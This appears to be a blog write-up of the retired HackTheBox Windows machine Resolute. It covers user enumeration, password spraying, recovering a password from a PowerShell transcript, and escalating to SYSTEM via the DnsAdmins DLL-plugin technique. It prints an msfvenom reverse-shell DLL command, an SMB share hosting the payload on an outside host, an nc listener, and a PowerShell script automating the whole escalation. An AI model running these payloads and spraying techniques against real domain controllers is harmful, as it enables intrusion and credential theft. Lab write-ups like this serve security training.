HackTheBox - Resolute

Summary

Resolute is a medium-difficulty Windows box created by egre55. The initial foothold comes from enum4linux: the description field of one user account contains a default password, and spraying that single password across every enumerated user turns up an account that still uses it. Those credentials give a WinRM shell and user.txt. Lateral movement to ryan comes from his password left behind in a PowerShell transcript under C:\PSTranscripts. ryan is a member of the DnsAdmins group, which lets him point the DNS server at an attacker-controlled plugin DLL and obtain a SYSTEM shell on the domain controller.

Enumeration

nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 09:13 WIT
Stats: 0:03:16 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.11% done; ETC: 09:17 (0:00:00 remaining)
Stats: 0:05:23 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.86% done; ETC: 09:19 (0:00:01 remaining)
Nmap scan report for 10.10.10.169
Host is up (0.41s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-09 09:23:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/9%Time=5E3F4EF7%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 11h48m20s, deviation: 4h37m09s, median: 9h08m18s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-02-09T01:25:27-08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-02-09T09:25:26
|_ start_date: 2020-02-09T04:22:37

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 334.05 seconds

Only Kerberos, LDAP, SMB and DNS related ports are open and there is no web service, which indicates this is a Windows domain controller for megabank.local (the SMB host scripts confirm the FQDN Resolute.megabank.local).

Let's run enum4linux to dump whatever it can over a null session.

Looking at the result, RID cycling gives us a list of domain users:

Administrator
Guest
krbtgt
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki

In the same response one account's description field is far more interesting:
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko	Name: Marko Novak	Desc: Account created. Password set to Welcome123!

That reads like an onboarding default: Welcome123!. Trying it against marko himself fails, so his password has since been changed:
evil-winrm -i 10.10.10.169 -u marko -p Welcome123!

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Someone else may still be on that default, though. Spraying one password across every enumerated user is a low-risk way to find out (a single attempt per account stays well under any sane lockout threshold), so I used Metasploit's smb_login scanner (auxiliary/scanner/smb/smb_login) with the user list above and Welcome123!:

[*] 10.10.10.169:445 - 10.10.10.169:445 - Starting SMB login bruteforce
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\:Welcome123!',
[!] 10.10.10.169:445 - No active DB -- Credential data will not be saved!
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\Administrator:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\Administrator:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\Guest:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\Guest:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\krbtgt:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\krbtgt:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\ryan:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\ryan:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\marko:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\marko:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\sunita:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\sunita:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\abigail:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\abigail:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\marcus:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\marcus:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\sally:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\sally:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\fred:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\fred:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\angela:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\angela:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\felicia:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\felicia:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\gustavo:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\gustavo:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\ulf:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\ulf:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\stevie:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\stevie:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\claire:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\claire:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\paulo:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\paulo:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\steve:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\steve:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\annette:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\annette:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\annika:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\annika:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\per:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\per:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\claude:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\claude:Welcome123!',
[+] 10.10.10.169:445 - 10.10.10.169:445 - Success: 'MEGABANK\melanie:Welcome123!'
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\zach:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\zach:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\simon:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\simon:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\naoki:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\naoki:Welcome123!',
[*] 10.10.10.169:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Exactly one account accepts it:

[+] 10.10.10.169:445      - 10.10.10.169:445 - Success: 'MEGABANK\melanie:Welcome123!'

melanie still has the default password set.

User

With melanie's credentials we can log in over WinRM and get user. WinRM (5985/tcp) was not among the 1000 ports scanned above, which is why it does not appear in the nmap output; a full -p- scan would show it.

evil-winrm -u melanie -p  Welcome123! -i 10.10.10.169

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents>

and from there we can read user.txt.

Privilege Escalation (ryan)

Running dir -force on the root of C: (the -Force switch also lists hidden items) reveals an unusual hidden folder, PSTranscripts:

*Evil-WinRM* PS C:\> dir -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 2/8/2020 8:22 PM 402653184 pagefile.sys

*Evil-WinRM* PS C:\>

That folder holds a PowerShell transcript, PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt. PowerShell transcription, when enabled by policy, records every command and its output to a text file, so this is worth reading in full. In it we find:

********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError

Someone tried to mount \\fs01\backups with ryan's account. The command failed because the arguments are in the wrong order (net use expects the password first and then /user:ryan), which is why cmd printed the syntax error, but the transcript still recorded the full command line, password included:

ryan:Serv3r4Admin4cc123!

Those credentials work over WinRM too, giving us a shell as ryan.
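As an added example (not from the original writeup), here is a PowerShell sweep of transcript files for credentials passed on command lines. The C:\PSTranscripts path is from the box; the second search path, the extra patterns beyond the net use form seen here, and the sample text below are assumptions and constructed data for this example.

```powershell
# Added example, not from the original writeup: hunt PowerShell transcripts for credentials
# that were typed on a command line. Only C:\PSTranscripts is known from the box; the rest
# of the search paths and patterns are assumptions.

function Find-TranscriptCredentials {
    param(
        [Parameter(Mandatory)][AllowEmptyCollection()][string[]]$Text,
        [string]$Source = '<inline>'
    )
    # Ordered: the documented net use form first, then the reversed form seen on this box.
    $patterns = @(
        @{ Kind = 'net use (/user:)';     Regex = '(?i)net\s+use\s+\S+\s+(?<share>\\\\[^\s]+)\s+(?<pass>\S+)\s+/user:(?<user>\S+)' },
        @{ Kind = 'net use (positional)'; Regex = '(?i)net\s+use\s+\S+\s+(?<share>\\\\[^\s]+)\s+(?<user>[^/\s]+)\s+(?<pass>\S+)\s*$' },
        @{ Kind = 'ConvertTo-SecureString'; Regex = '(?i)ConvertTo-SecureString\s+(?:-String\s+)?[''"]?(?<pass>[^''"\s]+)' },
        @{ Kind = 'password switch';      Regex = '(?i)(?:-p(?:ass|assword)?\s+|/p(?:ass|assword)?:|password\s*[=:]\s*)[''"]?(?<pass>[^''"\s]+)' }
    )
    foreach ($line in $Text) {
        foreach ($p in $patterns) {
            if ($line -match $p.Regex) {
                [pscustomobject]@{
                    Source   = $Source
                    Kind     = $p.Kind
                    User     = [string]$Matches['user']   # empty when the pattern has no user group
                    Password = $Matches['pass']
                    Line     = $line.Trim()
                }
                break   # one finding per line
            }
        }
    }
}

function Search-TranscriptDirs {
    # Assumed locations; add whatever the transcription policy points at in your environment.
    param([string[]]$Paths = @('C:\PSTranscripts', "$env:USERPROFILE\Documents"))
    foreach ($root in $Paths) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        # -Force: the folder is hidden (d--h--), and the files inside may be too.
        Get-ChildItem -LiteralPath $root -Recurse -Force -File -Include *.txt -ErrorAction SilentlyContinue |
            ForEach-Object {
                $content = @(Get-Content -LiteralPath $_.FullName -ErrorAction SilentlyContinue)
                if ($content.Count) { Find-TranscriptCredentials -Text $content -Source $_.FullName }
            }
    }
}

# Constructed from the transcript lines quoted above (the failing command is logged twice there).
$sample = @'
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
'@ -split "`r?`n"

Find-TranscriptCredentials -Text $sample |
    Sort-Object User, Password -Unique |
    Format-Table Kind, User, Password, Line -AutoSize

# On the box:  Search-TranscriptDirs | Sort-Object Source, User, Password -Unique | Format-List
```

The positional pattern is anchored to the end of the line because the reversed form has no /user: marker to key on; it is second in the list so that a correctly written net use is not mis-parsed as user/password swapped.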

Privilege Escalation (SYSTEM)

Checking ryan's groups with whoami /groups shows that he is a member of DnsAdmins:

Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192

Members of DnsAdmins can reconfigure the DNS server, including its ServerLevelPluginDll setting, and the DNS service (dns.exe) runs as SYSTEM on the domain controller. Pointing that setting at a DLL we control and restarting the service therefore gives code execution as SYSTEM. This DnsAdmins privilege escalation is well documented, and I followed one of the public articles: build a malicious DLL, host it on an SMB share, and tell the DNS server to load it.

DLL creation (x64, to match the dns.exe process):

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.X.X LPORT=4444 --platform=windows -f dll > ~/windows/privesc/plugin.dll

Hosting it over SMB with impacket's smbserver.py (dns.exe will fetch the DLL as the machine account, and smbserver accepts any credentials by default):

python3 smbserver.py -smb2support SHARE ~/windows/privesc/

I started an nc listener in another pane on port 4444:

nc -nvlp 4444

In the WinRM pane, I pointed serverlevelplugindll at the share with dnscmd:

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd /config /serverlevelplugindll \\10.10.X.X\SHARE\plugin.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

The DLL is only loaded when dns.exe starts, so the service has to be restarted. DnsAdmins membership does not by itself grant service-control rights, but ryan is allowed to stop and start DNS on this box:

sc.exe stop dns
sc.exe start dns

Back on the nc listener we get a shell as nt authority\system and can read root.txt:

C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32> cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
e1d94876XXXXXXXXXXXXXXXXXXXX619c
C:\Users\Administrator\Desktop>
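The DnsAdmins steps above, collected into one PowerShell script with the checks a practitioner wants before and after. This is an added example, not the writeup's own code: run it in the ryan WinRM shell on the DC once the SMB share and nc listener are up. The share path reuses the writeup's placeholder IP (10.10.X.X); the registry key is the real location the ServerLevelPluginDll setting lives at, and everything else here (function names, timeouts, cleanup approach) is this example's assumption.

```powershell
# Added example, not from the original writeup: the DnsAdmins -> SYSTEM chain with pre/post checks.
# Assumes \\10.10.X.X\SHARE\plugin.dll (placeholder IP, as in the writeup) is reachable from the DC.

$PluginDll = '\\10.10.X.X\SHARE\plugin.dll'
$DnsParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Test-DnsAdminsMember {
    # Translate the caller's group SIDs to names and look for DnsAdmins.
    $groups = [System.Security.Principal.WindowsIdentity]::GetCurrent().Groups
    foreach ($sid in $groups) {
        try { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { continue }
        if ($name -match '\\DnsAdmins$') { return $true }
    }
    return $false
}

function Get-DnsPluginDll {
    # The value dnscmd writes. Any non-empty value on a DC deserves an alert from the blue team.
    (Get-ItemProperty -Path $DnsParams -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
}

function Set-DnsPluginDll {
    param([Parameter(Mandatory)][string]$Path)
    # dnscmd reaches the DNS server over RPC; DnsAdmins membership is what authorises the change.
    $out = & dnscmd.exe /config /serverlevelplugindll $Path 2>&1
    if (-not ($out -match 'Command completed successfully')) {
        throw "dnscmd rejected the change:`n$($out -join "`n")"
    }
    $readback = Get-DnsPluginDll
    if ($readback -ne $Path) { Write-Warning "Registry shows '$readback' (expected '$Path')" }
}

function Restart-DnsServer {
    # dns.exe only loads the plugin at start-up. DnsAdmins membership alone does not grant
    # stop/start rights; ryan has them on this box, elsewhere you may have to wait for a reboot.
    $svc = Get-Service -Name DNS
    & sc.exe stop DNS | Out-Null
    try { $svc.WaitForStatus('Stopped', [TimeSpan]::FromSeconds(30)) }
    catch { throw 'DNS did not stop: no service-control rights on it, or it is hung.' }
    & sc.exe start DNS | Out-Null
    # start may report a timeout once the DLL has taken over the process; the callback is what matters.
}

function Remove-DnsPluginDll {
    # Cleanup, to be run from the SYSTEM shell (or any account with write access to the key):
    # clear the value and cycle the service so dns.exe comes back without the plugin. From the
    # cmd shell the payload gives you:  powershell -c "Remove-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters -Name ServerLevelPluginDll"
    Remove-ItemProperty -Path $DnsParams -Name ServerLevelPluginDll -ErrorAction Stop
    & sc.exe stop DNS | Out-Null
    Start-Sleep -Seconds 5
    & sc.exe start DNS | Out-Null
}

if (-not (Test-DnsAdminsMember)) { throw 'Current user is not in DnsAdmins; this path does not apply.' }
Write-Host "ServerLevelPluginDll before: '$(Get-DnsPluginDll)'"
Set-DnsPluginDll -Path $PluginDll
Restart-DnsServer
Write-Host "ServerLevelPluginDll after:  '$(Get-DnsPluginDll)'  (check the nc listener now)"
```

Two points the bare command sequence hides: the failure mode of each step is made explicit (dnscmd's own success text is checked rather than its exit code, and a stop that never completes is reported as the missing service-control right), and Remove-DnsPluginDll is there because leaving ServerLevelPluginDll pointing at an attacker share leaves the DC's DNS broken and leaves a loud indicator behind. From the defensive side, that same registry value plus an unexpected DNS service restart on a domain controller is the detection to build.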

and we have pwned Resolute 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/resolute/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.